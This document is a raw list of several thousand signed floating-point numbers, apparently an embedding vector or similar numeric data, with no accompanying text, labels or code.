0.0007418259046971798, -0.011984379962086678, -0.008896512910723686, -0.010868716984987259, 0.006981891114264727, -0.0008344979141838849, 0.025408323854207993, -0.033685825765132904, 0.006474444177001715, -0.014841916970908642, 0.023220185190439224, 0.010998277924954891, -0.005052873864769936, -0.010933496989309788, 0.033772196620702744, 0.03976079076528549, 0.019635668024420738, -0.04033661633729935, -0.014244496822357178, -0.01895907334983349, 0.006398866884410381, 0.004336690064519644, -0.008162334561347961, -0.003107661148533225, -0.006060569081455469, -0.04025024175643921, -0.008730962872505188, -0.022946668788790703, -0.0024976455606520176, -0.008493434637784958, -0.020427430048584938, -0.006503235548734665, -0.029309546574950218, 0.016986869275569916, 0.000653652532491833, -0.005315594375133514, 0.04143068566918373, 0.03092185966670513, -0.01353911031037569, 0.010184923186898232, -0.013596693053841591, -0.006474444177001715, 0.050816647708415985, -0.041027605533599854, 0.0691567063331604, -0.030749112367630005, -0.011055860668420792, -0.02727975882589817, 0.0009726061834953725, -0.04056694731116295, 0.009587503969669342, -0.0071726334281265736, -0.006654389668256044, 0.015417742542922497, 0.010213715024292469, -0.014388453215360641, -0.021751828491687775, -0.01656939461827278, -0.01290570106357336, 0.014733949676156044, 0.010321682319045067, 0.011048662476241589, -0.0029097211081534624, 0.017073241993784904, 0.02180941216647625, -0.02700624242424965, 0.0012785138096660376, -0.003564723301678896, -0.02481810376048088, 0.042208049446344376, 0.006690379232168198, 0.008694973774254322, 0.0007107852725312114, -0.003089666599407792, -0.012185919098556042, 0.01772104762494564, 0.014366860501468182, 0.001082373084500432, -0.001554730348289013, -0.002769363345578313, 0.0065896096639335155, 0.010602396912872791, 0.007420958485454321, -0.013863012194633484, -0.019160611554980278, 0.0018984265625476837, -0.011545312590897083, -0.010919101536273956, 0.010444045066833496, 0.028330642729997635, 0.01880072057247162, -0.026977451518177986, -0.04013507440686226, -0.0101705277338624, 0.00957310851663351, -0.021938972175121307, -0.03679528459906578, 0.002898924285545945, 0.00003379604095243849, 0.0033811787143349648, 0.019419733434915543, -0.01437405776232481, 0.024458210915327072, 0.043877944350242615, -0.0039156172424554825, -0.02196776494383812, 0.022298863157629967, -0.016238294541835785, -0.005682683549821377, -0.001673494465649128, 0.06236196309328079, 0.016238294541835785, 0.014827520586550236, -0.0004203980206511915, 0.016526207327842712, 0.016281481832265854, -0.016238294541835785, -0.004642597399652004, -0.008183928206562996, -0.01724599115550518, -0.01749071665108204, -0.003724874695762992, -0.016238294541835785, -0.002589417854323983, -0.015676863491535187, -0.007428156211972237, -0.011307784356176853, 0.0332251638174057, -0.003487346461042762, 0.0017751638079062104, 0.012365864589810371, 0.002031586365774274, 0.0020045945420861244, 0.02347930707037449, 0.06178613752126694, 0.008104751817882061, -0.012624986469745636, 0.013683066703379154, 0.00029376125894486904, -0.013128833845257759, 0.024055132642388344, 0.00874535832554102, 0.011890808120369911, -0.009645086713135242, -0.006337685510516167, 0.008774149231612682, 0.001476453966461122, 0.003413568949326873, -0.028445806354284286, 0.002488648286089301, -0.010480034165084362, -0.03080669417977333, 0.00023842797963880002, -0.010300088673830032, -0.008918105624616146, -0.017231594771146774, 0.0017085839062929153, -0.01348152756690979, -0.0021881391294300556, 0.009443547576665878, 0.009760251268744469, -0.01294888835400343, 0.0036151078529655933, -0.002045982051640749, 0.006823538802564144, 0.0316416434943676, -0.04517355561256409, 0.020600177347660065, 0.014856312423944473, 0.029323941096663475, -0.012106742709875107, 0.048398181796073914, -0.031065816059708595, 0.006895516999065876, -0.034434396773576736, -0.026977451518177986, 0.008694973774254322, -0.009774647653102875, -0.022183699533343315, 0.005567518062889576, 0.01130058616399765, 0.016713351011276245, 0.0025858189910650253, -0.006953099742531776, -0.002270913915708661, -0.026574373245239258, -0.048714883625507355, 0.037486277520656586, 0.02307622879743576, -0.03837880492210388, -0.027898771688342094, 0.026200085878372192, 0.0006869424832984805, -0.015792028978466988, 0.04154584929347038, 0.014143727719783783, 0.014028562232851982, 0.024055132642388344, -0.00600658543407917, -0.017634673044085503, 0.01348152756690979, 0.001979402033612132, -0.009666680358350277, -0.0127689428627491, 0.013927793130278587, -0.00046336001832969487, -0.03120977245271206, 0.004397871438413858, 0.004570619203150272, 0.0004239969130139798, -0.005513534415513277, -0.030864275991916656, 0.005841035395860672, 0.008781347423791885, 0.011977181769907475, 0.014006968587636948, 0.002272713463753462, 0.023248977959156036, -0.015432137995958328, 0.0010535817127674818, -0.0017877599457278848, 0.02232765592634678, 0.04695861414074898, -0.014705157838761806, -0.001341494731605053, -0.014640377834439278, 0.005419962573796511, 0.003858034498989582, -0.007708871271461248, -0.005959799513220787, -0.003840039949864149, -0.022500403225421906, 0.006074965000152588, 0.007370573468506336, 0.011149431578814983, -0.008752556517720222, -0.001947011798620224, 0.016195107251405716, -0.006550021469593048, 0.04511597007513046, -0.001929017249494791, -0.01148053165525198, 0.023176997900009155, -0.01225069910287857, 0.005016884300857782, -0.028733721002936363, -0.023148206993937492, 0.0015133428387343884, -0.04848455265164375, -0.031180981546640396, -0.04025024175643921, 0.008637391030788422, 0.022154906764626503, 0.01633906364440918, -0.017994564026594162, 0.014071749523282051, 0.015057851560413837, 0.018484016880393028, -0.023968759924173355, -0.012157127261161804, 0.011545312590897083, -0.00703947339206934, -0.0011804434470832348, -0.025912173092365265, 0.017908191308379173, 0.00775205809623003, 0.03417527675628662, -0.010760749690234661, -0.024357441812753677, 0.012459436431527138, -0.0007314790273085237, 0.011091849766671658, 0.014201310463249683, 0.020269077271223068, 0.012085149064660072, 0.0196644589304924, -0.008781347423791885, 0.01975083351135254, -0.015993569046258926, -0.0020243884064257145, -0.043474867939949036, -0.03342670202255249, 0.02474612556397915, -0.02074413374066353, -0.004955702926963568, -0.01201317086815834, 0.026948658749461174, -0.035989128053188324, -0.0059993877075612545, 0.0006406065076589584, 0.00959470123052597, 0.016554998233914375, 0.007136644329875708, -0.009256403893232346, -0.006909912917762995, -0.018815116956830025, -0.010875914245843887, 0.0026865885592997074, -0.004037980455905199, -0.030518781393766403, 0.010854321531951427, -0.017389947548508644, 0.024055132642388344, -0.013042460195720196, -0.008183928206562996, -0.013272790238261223, -0.013798232190310955, -0.016684560105204582, 0.0003351487684994936, -0.009371569380164146, 0.003021287266165018, -0.002781959716230631, -0.008486236445605755, -0.002607412403449416, -0.033167582005262375, -0.008054367266595364, 0.006038975901901722, 0.0210176520049572, 0.01264658011496067, -0.005513534415513277, -0.0017643669852986932, -0.013517516665160656, 0.009479536674916744, -0.024645354598760605, -0.003998392261564732, -0.016425438225269318, 0.02997174672782421, -0.011617290787398815, -0.0034729510080069304, -0.008846127428114414, -0.012272292748093605, 0.014697960577905178, 0.0003979048051405698, 0.013495923019945621, -0.036968033760786057, -0.011617290787398815, -0.02866174280643463, 0.016396647319197655, -0.005020483396947384, -0.02442942000925541, -0.013639879412949085, -0.0101705277338624, -0.01882951147854328, -0.04393552988767624, -0.019103029742836952, -0.03391615301370621, -0.01733236387372017, 0.07917608320713043, -0.020844902843236923, -0.01692928560078144, -0.0035773194395005703, -0.003035682952031493, -0.008241510018706322, 0.03644979000091553, 0.010775145143270493, -0.005581913981586695, -0.02153589390218258, 0.015648072585463524, -0.015057851560413837, 0.010811134241521358, 0.013157625682651997, 0.010242505930364132, 0.024127112701535225, 0.011386960744857788, -0.02454458549618721, 0.007586508523672819, 0.03092185966670513, -0.01353911031037569, -0.010998277924954891, 0.01518741250038147, 0.014813125133514404, 0.003771660616621375, 0.006348482333123684, -0.033772196620702744, 0.01589279994368553, 0.025077225640416145, 0.007201424799859524, 0.009803438559174538, -0.0015556301223114133, 0.024055132642388344, -0.014784334227442741, 0.011566906236112118, 0.017231594771146774, 0.012020369060337543, -0.004365481436252594, 0.017505113035440445, -0.02522118203341961, 0.0027225776575505733, 0.005506336688995361, 0.008666181936860085, 0.04551905021071434, -0.019261382520198822, -0.023320956155657768, -0.029827790334820747, 0.010062560439109802, -0.02501964196562767, -0.0019740036223083735, -0.003598912851884961, 0.019923580810427666, 0.0017184808384627104, 0.011854819022119045, -0.0224860068410635, 0.027898771688342094, 0.0020387840922921896, 0.002065775915980339, -0.011084651574492455, -0.004354684613645077, -0.015072247013449669, 0.005189632531255484, -0.005319193005561829, -0.01760588213801384, 0.017073241993784904, -0.009767449460923672, -0.011451740749180317, -0.013827023096382618, -0.01946292072534561, 0.0005771756405010819, 0.02617129497230053, -0.00019569088181015104, 0.006895516999065876, -0.0034495580475777388, -0.017433132976293564, 0.005146445240825415, 0.017505113035440445, 0.005401968024671078, -0.020916881039738655, -0.022428425028920174, 0.028488993644714355, 0.01413652952760458, -0.005524331238120794, 0.0015736246714368463, 0.0009114246931858361, 0.005934607237577438, -0.019448524340987206, 0.01724599115550518, 0.006056970451027155, -0.002882729284465313, -0.013791033998131752, 0.006467246450483799, 0.007384969387203455, 0.007507332134991884, -0.013258394785225391, 0.005578314885497093, -0.0011039664968848228, 0.005373177118599415, -0.022845899686217308, -0.007201424799859524, 0.013618286699056625, 0.011962786316871643, 0.014129332266747952, -0.012459436431527138, 0.0049269115552306175, 0.004415865987539291, 0.040451779961586, 0.0029475095216184855, -0.017634673044085503, -0.003987595438957214, 0.0012803132412955165, -0.013510318472981453, -0.0009654083987697959, -0.03310999646782875, 0.005779854021966457, -0.02386799082159996, 0.023493703454732895, 0.008968491107225418, 0.018728742375969887, -0.01733236387372017, -0.0497225783765316, -0.001929017249494791, 0.0064132628031075, -0.007838431745767593, 0.008594203740358353, 0.01106305792927742, -0.01812412589788437, -0.008615797385573387, 0.03950166702270508, 0.016238294541835785, 0.011055860668420792, 0.015720050781965256, 0.006960297469049692, 0.045346301048994064, 0.008759753778576851, -0.005477545317262411, -0.003958804067224264, -0.002695585833862424, -0.024011947214603424, -0.008471840992569923, -0.026617558673024178, 0.009796240366995335, 0.03760144114494324, -0.009083655662834644, 0.0037104792427271605, 0.004444657359272242, -0.023105019703507423, 0.002787357894703746, -0.00898288656026125, -0.00702867703512311, 0.013704660348594189, -0.010674375109374523, 0.01360389031469822, -0.009249205701053143, -0.016223900020122528, 0.007881619036197662, -0.0047721583396196365, -0.027020636945962906, 0.017159616574645042, -0.012020369060337543, 0.02517799474298954, -0.02319139428436756, 0.030000537633895874, 0.003620506264269352, -0.0015907194465398788, 0.017116429284214973, 0.0029816993046551943, -0.04479926824569702, -0.013172021135687828, -0.004592212848365307, 0.008443049155175686, 0.007320188917219639, 0.004487844184041023, 0.004743366967886686, 0.02208292856812477, 0.027654046192765236, -0.01744752936065197, 0.012265094555914402, 0.025797007605433464, 0.017706651240587234, 0.004567020572721958, 0.00017938330711331218, -0.01217152364552021, 0.010372066870331764, 0.0227163378149271, 0.017850607633590698, 0.009371569380164146, 0.008601401932537556, -0.04618125036358833, 0.003483747597783804, 0.0028233472257852554, 0.05594149976968765, -0.018973467871546745, -0.0024670548737049103, 0.030317241325974464, 0.0015358360251411796, -0.010904706083238125, -0.019261382520198822, 0.019203798845410347, -0.030317241325974464, 0.02799954265356064, 0.014741146937012672, 0.005866228137165308, -0.010235307738184929, 0.0023356943856924772, -0.024487003684043884, -0.02232765592634678, -0.002166545484215021, 0.008032773621380329, 0.022054137662053108, -0.02454458549618721, -0.0031634443439543247, 0.02866174280643463, -0.019995559006929398, 0.02838822454214096, 0.0029619052074849606, -0.012041962705552578, -0.017908191308379173, -0.014942686073482037, -0.0075001344084739685, 0.020485011860728264, 0.016626978293061256, -0.005157242063432932, 0.023292163386940956, 0.010235307738184929, 0.012308281846344471, -0.014158123172819614, -0.021305564790964127, -0.00927799753844738, 0.009328382089734077, 0.0024814503267407417, -0.014028562232851982, 0.010494429618120193, -0.0027783606201410294, -0.013136032037436962, -0.013258394785225391, 0.002949309069663286, -0.003735671518370509, -0.0023320955224335194, -0.0006887419731356204, 0.011919599026441574, 0.009054864756762981, 0.007867223583161831, 0.003987595438957214, -0.01447482779622078, -0.00025214883498847485, 0.006571614649146795, -0.014525212347507477, -0.022889085114002228, 0.0012101344764232635, 0.021233586594462395, 0.006226119119673967, 0.01577763445675373, -0.01780742034316063, -0.003699682420119643, 0.0024544585030525923, -0.020197099074721336, 0.013891804032027721, -0.014129332266747952, -0.009630691260099411, 0.011754048988223076, -0.018786326050758362, 0.030950650572776794, -0.025523489341139793, -0.02831624634563923, 0.014518014155328274, -0.014647575095295906, -0.014719553291797638, 0.006143344100564718, -0.00549194123595953, 0.0179657731205225, 0.004804548807442188, 0.028100311756134033, 0.0005537827382795513, -0.02736613340675831, 0.009558712132275105, 0.019808417186141014, -0.003431563498452306, -0.016267085447907448, -0.001689689583145082, 0.0005065469886176288, 0.02608492039144039, 0.03092185966670513, -0.018340060487389565, 0.017936982214450836, 0.0016024159267544746, -0.010105747729539871, 0.0005780753563158214, 0.008853325620293617, 0.026617558673024178, -0.021435124799609184, -0.0011246602516621351, 0.022975459694862366, -0.013618286699056625, -0.031353726983070374, 0.004887323826551437, -0.009018875658512115, 0.01560488622635603, 0.03224625810980797, -0.020643364638090134, -0.0024184694048017263, 0.01907423883676529, 0.050298407673835754, 0.0046965815126895905, -0.02097446471452713, -0.007658486720174551, -0.013380758464336395, -0.027423715218901634, -0.00027306750416755676, 0.001518741250038147, 0.007701673544943333, 0.0022961064241826534, -0.00006680482329102233, 0.02133435569703579, -0.002850339049473405, -0.011869214475154877, 0.006708373781293631, 0.015345764346420765, -0.030662737786769867, -0.013323175720870495, -0.004037980455905199, 0.009436349384486675, -0.012869711965322495, 0.015792028978466988, 0.008630192838609219, 0.006388070527464151, -0.0010544814867898822, -0.007579310331493616, -0.010811134241521358, 0.001790459151379764, -0.013078449293971062, -0.013049658387899399, -0.003463953733444214, -0.014345266856253147, -0.007845629937946796, -0.015043456107378006, 0.011840423569083214, -0.009853823110461235, -0.031180981546640396, 0.0007616199436597526, -0.025797007605433464, 0.02117600291967392, 0.0039012215565890074, 0.005419962573796511, -0.012301084585487843, -0.0031166584230959415, 0.007464145310223103, -0.0029781004413962364, -0.03518297150731087, -0.01471235603094101, -0.01040805596858263, 0.023580076172947884, 0.004898120183497667, 0.010847123339772224, 0.013618286699056625, 0.024098319932818413, 0.004919713828712702, 0.007888817228376865, -0.00288452859967947, -0.0026362037751823664, -0.013150427490472794, 0.002355488482862711, -0.004703779239207506, 0.01163888443261385, -0.0028071519918739796, -0.011574103496968746, -0.025120411068201065, 0.003210230264812708, 0.010847123339772224, 0.02589777670800686, -0.02431425452232361, -0.01661258190870285, -0.024285463616251945, 0.014654773287475109, 0.015792028978466988, 0.004822543356567621, 0.02854657731950283, 0.025005247443914413, -0.0065644169226288795, 0.0025336346589028835, -0.014021364040672779, -0.019794020801782608, -0.019808417186141014, 0.0029097211081534624, -0.0072266170755028725, 0.005949003156274557, -0.017533903941512108, 0.0014305678196251392, -0.010156132280826569, -0.010300088673830032, 0.030317241325974464, -0.0004548126016743481, 0.007021478842943907, 0.047044988721609116, -0.03575879707932472, 0.02232765592634678, -0.0005092461942695081, -0.009724262170493603, -0.01395658403635025, -0.019678855314850807, -0.002474252600222826, -0.029453502967953682, -0.0024670548737049103, 0.014870707876980305, -0.012322677299380302, 0.020240286365151405, 0.012265094555914402, -0.04007749259471893, 0.03129614517092705, -0.020672155544161797, 0.021204793825745583, -0.026156898587942123, -0.01550411619246006, -0.0181961040943861, -0.027351737022399902, 0.004009189084172249, 0.01035047322511673, 0.02874811552464962, -0.006532026920467615, 0.009227612987160683, -0.02359447255730629, 0.0059993877075612545, 0.005096060689538717, -0.013769440352916718, -0.00288452859967947, -0.01654060371220112, 0.0019092232687398791, -0.01466916874051094, 0.00046336001832969487, -0.014489223249256611, -0.011890808120369911, -0.011142234317958355, 0.005751062650233507, 0.017030056565999985, 0.019722042605280876, 0.009076458401978016, 0.007255408447235823, 0.009954593144357204, -0.021938972175121307, 0.021723037585616112, -0.0005717772874049842, -0.02850339002907276, -0.010127340443432331, 0.0422656312584877, -0.021262377500534058, -0.019794020801782608, 0.015518512576818466, 0.01704445108771324, -0.009083655662834644, -0.025350742042064667, 0.03296604007482529, 0.02058578096330166, 0.0029942954424768686, 0.001409874064847827, 0.0068559288047254086, 0.0015736246714368463, 0.00444105826318264, 0.0010778744472190738, -0.02296106331050396, 0.006683181039988995, 0.00832788459956646, 0.002063976600766182, 0.005599908530712128, 0.018095333129167557, 0.029410315677523613, 0.018181707710027695, 0.013560703955590725, 0.00395520543679595, 0.019246986135840416, -0.00840706005692482, -0.0009060263400897384, 0.013488725759088993, -0.006485240999609232, -0.0002377531782258302, 0.01704445108771324, -0.004178337752819061, -0.0181961040943861, -0.014042957685887814, -0.005207627080380917, 0.005772656295448542, 0.0014890502206981182, 0.01803775131702423, -0.015115434303879738, -0.005006087943911552, -0.002650599228218198, 0.03950166702270508, 0.00828469730913639, -0.0072266170755028725, 0.004390673711895943, -0.0005276905721984804, 0.00579784857109189, -0.00016037655586842448, -0.005459550768136978, 0.013863012194633484, -0.010062560439109802, 0.022701941430568695, -0.008766951970756054, 0.02049940824508667, 0.01169646717607975, 0.0016941882204264402, -0.03267812728881836, -0.002290708012878895, 0.008025575429201126, -0.021190399304032326, 0.008853325620293617, -0.001048183417879045, -0.027812398970127106, 0.040106285363435745, 0.011077453382313251, 0.009904208593070507, -0.010739156045019627, 0.004120755009353161, -0.003807649714872241, 0.0057078758254647255, -0.022989856079220772, 0.021938972175121307, -0.009407558478415012, 0.011127838864922523, -0.005171637982130051, -0.013265592977404594, -0.00275136879645288, 0.002747769933193922, 0.006002986803650856, 0.00680194515734911, -0.017145220190286636, 0.009321183897554874, -0.00008710493420949206, -0.003190436167642474, -0.0003769861359614879, 0.011804434470832348, -0.016799725592136383, 0.0027765613049268723, -0.004804548807442188, -0.026387229561805725, -0.013942188583314419, 0.012344270944595337, -0.009069260209798813, -0.005664689000695944, -0.011509323492646217, 0.024242276325821877, 0.00022054587316233665, -0.010069758631289005, 0.014726751483976841, 0.011336575262248516, 0.0025516292080283165, -0.0031868373043835163, 0.005805046297609806, 0.00600658543407917, -0.021866993978619576, -0.025321951135993004, -0.008896512910723686, -0.01954929530620575, -0.021838203072547913, -0.01371905580163002, 0.0000024566797947045416, -0.008587006479501724, -0.012401853688061237, -0.013690264895558357, -0.014114935882389545, -0.007824036292731762, -0.002769363345578313, -0.008903710171580315, 0.030518781393766403, -0.010544815100729465, 0.013690264895558357, 0.0102281104773283, 0.01314322929829359, 0.00344415963627398, 0.02359447255730629, -0.0034963437356054783, 0.017706651240587234, 0.011530917137861252, 0.010544815100729465, 0.0076368930749595165, 0.008486236445605755, 0.0031112602446228266, 0.0032300243619829416, 0.0016761936713010073, 0.017533903941512108, -0.012221908196806908, -0.0011408553691580892, 0.017620276659727097, -0.030662737786769867, -0.01447482779622078, -0.008774149231612682, -0.009587503969669342, -0.003003292717039585, 0.02465975098311901, -0.022255677729845047, 0.003951606340706348, 0.019894789904356003, 0.0300581194460392, -0.008435851894319057, -0.03175680711865425, 0.009666680358350277, -0.028258664533495903, -0.011365367099642754, 0.019088633358478546, 0.013517516665160656, -0.009328382089734077, 0.009702669456601143, -0.007384969387203455, 0.006614801939576864, 0.01638225093483925, -0.02558107301592827, -0.022385237738490105, 0.013798232190310955, 0.0017454727785661817, -0.015158620662987232, 0.0023860791698098183, -0.006902714725583792, -0.009925801306962967, -0.0028431410901248455, 0.001740074367262423, 0.027726024389266968, -0.0015340365935117006, -0.003840039949864149, -0.005207627080380917, -0.012092347256839275, 0.010235307738184929, 0.009083655662834644, -0.02822987176477909, -0.00880294106900692, 0.0006653490127064288, -0.008867721073329449, 0.01943412981927395, 0.0011516520753502846, -0.022313259541988373, 0.0016303075244650245, 0.014719553291797638, 0.00922041479498148, 0.0016510012792423368, -0.01672774739563465, -0.0026200085412710905, 0.004606608301401138, 0.01780742034316063, -0.009609097614884377, -0.012229105457663536, 0.00016330067592207342, -0.010192121379077435, 0.03385857120156288, -0.0008317987085320055, -0.018383247777819633, -0.021003255620598793, -0.00013664622383657843, -0.014640377834439278, -0.0023087025620043278, 0.014258893206715584, -0.0098322294652462, -0.003962403163313866, 0.0036241053603589535, -0.003566522616893053, 0.013438340276479721, 0.0017769632395356894, -0.0196644589304924, -0.029122402891516685, -0.02478931099176407, -0.017231594771146774, -0.016986869275569916, -0.014870707876980305, 0.015835216268897057, 0.01649741642177105, 0.008104751817882061, 0.01867116056382656, 0.0150866424664855, -0.0019632070325315, -0.0029996938537806273, 0.008457445539534092, 0.0059993877075612545, 0.011962786316871643, -0.01656939461827278, 0.004045178182423115, -0.00016937383043114096, 0.0007427256205119193, 0.00021098626893945038, -0.012624986469745636, 0.004138749558478594, -0.014798729680478573, -0.01518741250038147, -0.0029475095216184855, 0.01512982975691557, 0.00014193211973179132, 0.02478931099176407, -0.002027987502515316, 0.033599451184272766, 0.0010526820551604033, 0.009659482166171074, -0.015288181602954865, 0.0075145298615098, 0.03069152869284153, -0.007302194368094206, -0.010285693220794201, -0.017634673044085503, -0.014244496822357178, 0.014539607800543308, -0.04079727455973625, 0.0017166814068332314, 0.0032624145969748497, -0.0079104108735919, -0.014885103330016136, 0.0172891765832901, -0.006074965000152588, -0.014841916970908642, 0.01193399541079998, -0.009443547576665878, 0.012675371021032333, -0.003822045400738716, 0.007093457039445639, -0.02573942393064499, -0.00009891387162497267, 0.002611011266708374, -0.015115434303879738, 0.003858034498989582, 0.0017049849266186357, -0.03239021450281143, -0.020888090133666992, -0.012891305610537529, 0.004973697476089001, 0.022629963234066963, -0.009227612987160683, -0.008853325620293617, 0.008241510018706322, 0.014705157838761806, 0.032332632690668106, -0.01577763445675373, -0.019851602613925934, 0.0035899155773222446, -0.01159569714218378, -0.005247214809060097, -0.0026362037751823664, 0.016583791002631187, 0.0070538693107664585, 0.00999058224260807, 0.00963788852095604, -0.00002492528255970683, -0.017908191308379173, 0.015201807953417301, -0.018843907862901688, -0.005751062650233507, 0.02506282925605774, 0.013323175720870495, 0.004664191044867039, 0.0035755198914557695, -0.006701175589114428, 0.004376278258860111, 0.00012517468712758273, -0.017159616574645042, 0.00940036028623581, 0.0019182205433025956, 0.0028449406381696463, 0.005995788611471653, 0.014503618702292442, 0.015043456107378006, 0.02720778062939644, -0.008853325620293617, -0.007014281116425991, -0.010076955892145634, 0.010623990558087826, 0.01377663854509592, 0.005956200882792473, 0.004318695515394211, -0.005139247514307499, -0.003516137832775712, -0.0007022378849796951, 0.008788545615971088, -0.002657797187566757, 0.011473334394395351, 0.005481144413352013, 0.013287186622619629, 0.0032660134602338076, 0.003487346461042762, -0.008075960911810398, 0.007651288527995348, -0.005754661746323109, 0.011574103496968746, -0.021262377500534058, 0.006247712764889002, -0.000939316232688725, 0.011905203573405743, -0.011667675338685513, 0.026200085878372192, -0.013028064742684364, -0.001426069182343781, -0.02343611977994442, 0.007896014489233494, 0.0067443628795444965, -0.015619281679391861, 0.03172801434993744, -0.010991079732775688, -0.012927294708788395, -0.022226884961128235, 0.00778084946796298, -0.008874919265508652, -0.009630691260099411, -0.006672384217381477, 0.01258899737149477, -0.01201317086815834, -0.001273115398362279, 0.02323458157479763, -0.013265592977404594, -0.006031778175383806, -0.030000537633895874, -0.015072247013449669, -0.0018273480236530304, -0.014280485920608044, 0.014841916970908642, -0.0028053526766598225, 0.019088633358478546, 0.006949500646442175, -0.020787321031093597, 0.005481144413352013, -0.0040343813598155975, 0.004084765911102295, 0.0026398026384413242, -0.03739990293979645, -0.020960068330168724, -0.010307286866009235, -0.004883724730461836, 0.027150198817253113, 0.0004970998270437121, -0.0004944006795994937, 0.00023392934235744178, 0.02474612556397915, 0.008896512910723686, -0.0068991160951554775, 0.006629197392612696, -0.003789655165746808, -0.018340060487389565, -0.0005326390964910388, -0.007860025390982628, -0.010652782395482063, -0.012020369060337543, -0.004142348654568195, -0.007766454014927149, -0.015964778140187263, -0.0019434129353612661, -0.01518741250038147, 0.010206516832113266, -0.012315480038523674, 0.01266817282885313, -0.015072247013449669, -0.020153911784291267, 0.01677093468606472, 0.022270072251558304, 0.02573942393064499, -0.007579310331493616, 0.003107661148533225, -0.004304299596697092, 0.005326391197741032, -0.03584517166018486, -0.0151442252099514, 0.0012542210752144456, -0.021276772022247314, 0.014885103330016136, -0.007507332134991884, 0.01092629972845316, 0.0061721354722976685, -0.006819939706474543, -0.025667445734143257, -0.025552282109856606, 0.025350742042064667, 0.010602396912872791, -0.012279490940272808, -0.022370843216776848, -0.0027063824236392975, -0.0019074238371104002, 0.002062177052721381, -0.007557717151939869, -0.0280283335596323, 0.0037104792427271605, -0.014985873363912106, -0.008479038253426552, 0.011379762552678585, -0.006100157275795937, -0.00273157493211329, 0.0033361921086907387, 0.0029942954424768686, -0.0038292433600872755, -0.04166101664304733, -0.0022457216400653124, 0.01672774739563465, -0.008349478244781494, -0.013503121212124825, -0.009342777542769909, -0.022975459694862366, -0.01353911031037569, 0.02070094645023346, -0.00003202470179530792, -0.014208507724106312, -0.03702561557292938, -0.02355128526687622, 0.020125120878219604, -0.003537731245160103, 0.016123129054903984, 0.027610858902335167, -0.004577816929668188, 0.015849612653255463, -0.00793200358748436, 0.011674873530864716, 0.004743366967886686, 0.010652782395482063, 0.011250201612710953, 0.00014080746041145176, 0.003469351911917329, 0.005621501710265875, -0.007392167113721371, -0.002146751619875431, 0.01431647501885891, -0.003418967127799988, -0.003190436167642474, -0.01437405776232481, 0.010393660515546799, -0.0037284737918525934, -0.003580918302759528, 0.04148826748132706, -0.0020351852290332317, -0.003055477049201727, 0.010803936049342155, 0.005078066140413284, 0.012898503802716732, 0.01954929530620575, -0.00935717299580574, 0.01094069518148899, 0.011178223416209221, -0.02608492039144039, 0.0069171106442809105, 0.0008965791785158217, 0.012265094555914402, -0.01431647501885891, -0.006395268253982067, 0.00038125982973724604, -0.00446984963491559, 0.012077951803803444, 0.0034747503232210875, -0.03155526891350746, -0.02938152477145195, 0.00550273759290576, 0.0022295264061540365, -0.03414648398756981, -0.009249205701053143, -0.01100547518581152, 0.005578314885497093, 0.01518741250038147, -0.030173284932971, 0.0044986410066485405, -0.01882951147854328, 0.01681412011384964, 0.0224860068410635, -0.008932502008974552, 0.016007963567972183, 0.0024256673641502857, 0.008572610095143318, -0.004570619203150272, 0.003307400969788432, -0.005481144413352013, 0.0005227421061135828, -0.011286190710961819, 0.002650599228218198, 0.0002148101048078388, -0.04888763278722763, -0.023090625181794167, -0.005430759396404028, 0.01518741250038147, 0.002474252600222826, 0.026703933253884315, 0.014244496822357178, -0.01425169501453638, 0.010314484126865864, 0.0052256216295063496, 0.0028395422268658876, 0.0059633986093103886, -0.00354852806776762, -0.0008142540464177728, -0.006690379232168198, 0.002886328147724271, 0.006197327747941017, -0.024083925411105156, 0.005405567120760679, -0.0011498526437208056, 0.010328879579901695, -0.015748843550682068, 0.018023354932665825, -0.012999272905290127, -0.012236303649842739, -0.013337571173906326, -0.010192121379077435, -0.011602895334362984, 0.010847123339772224, 0.018383247777819633, 0.005358781199902296, 0.006661587860435247, -0.005038477946072817, 0.00951552577316761, -0.013344768434762955, -0.017505113035440445, 0.01681412011384964, 0.006226119119673967, 0.013632682152092457, 0.00413515092805028, -0.014338068664073944, -0.0020423829555511475, -0.026315251365303993, 0.01990918628871441, 0.00320663140155375, -0.004862131085246801, 0.012301084585487843, -0.006949500646442175, 0.016439834609627724, -0.0028539379127323627, 0.025077225640416145, -0.002470653736963868, 0.020513802766799927, -0.009047666564583778, -0.016986869275569916, -0.002251120051369071, -0.0019434129353612661, -0.0023860791698098183, 0.007860025390982628, -0.02799954265356064, -0.025307554751634598, -0.0013091044966131449, -0.0035575253423303366, 0.002506642835214734, 0.019333360716700554, -0.003998392261564732, 0.005869826767593622, -0.009493932127952576, 0.005581913981586695, -0.017994564026594162, -0.004948505200445652, -0.006078563630580902, -0.0021809411700814962, -0.007007083389908075, 0.013740649446845055, -0.0023069032467901707, -0.000593370757997036, 0.0046174051240086555, 0.005495539866387844, 0.005002488847821951, 0.02009632997214794, -0.01294888835400343, -0.015417742542922497, -0.005409166216850281, -0.013546307571232319, 0.0050996593199670315, 0.0037968531250953674, 0.004559822380542755, 0.022025346755981445, -0.011307784356176853, 0.028359433636069298, -0.004001990891993046, 0.011826028116047382, -0.0030950650107115507, 0.0034405607730150223, -0.004545426927506924, -0.0029781004413962364, -0.005002488847821951, 0.04281266778707504, -0.0032498182263225317, 0.01724599115550518, -0.002117960248142481, 0.0019326162291690707, 0.035154182463884354, -0.00870217103511095, -0.003919215872883797, -0.01225069910287857, -0.0013882806524634361, -0.02212611585855484, -0.015489720739424229, 0.015763238072395325, 0.008874919265508652, 0.0022781118750572205, -0.021838203072547913, 0.009508327580988407, -0.008946897462010384, -0.014489223249256611, 0.0021917379926890135, 0.005052873864769936, 0.010004977695643902, -0.0038976226933300495, -0.0024850494228303432, -0.004844136536121368, 0.024328650906682014, -0.025725029408931732, 0.031411312520504, -0.006909912917762995, 0.0014881504466757178, -0.007413760293275118, 0.0028449406381696463, -0.017548298463225365, -0.007352578919380903, -0.0006626498070545495, -0.005815843120217323, -0.014345266856253147, 0.0015763238770887256, -0.021348750218749046, 0.008932502008974552, 0.006208124570548534, -0.0004568370059132576, -0.00030928157502785325, -0.011084651574492455, 0.0013909798581153154, -0.004405069164931774, -0.005686282180249691, 0.013279988430440426, 0.003735671518370509, -0.022845899686217308, 0.009450744837522507, -0.002747769933193922, 0.013963782228529453, -0.00816953182220459, -0.01324399933218956, 0.01163888443261385, 0.013949385844171047, 0.007795245386660099, 0.012920097447931767, 0.004624602850526571, 0.025725029408931732, -0.0037104792427271605, 0.01733236387372017, 0.001697787083685398, 0.0011795436730608344, -0.010861518792808056, 0.010962288826704025, -0.004397871438413858, -0.01645422913134098, -0.01556169893592596, -0.016468625515699387, 0.006733566056936979, -0.006287300959229469, 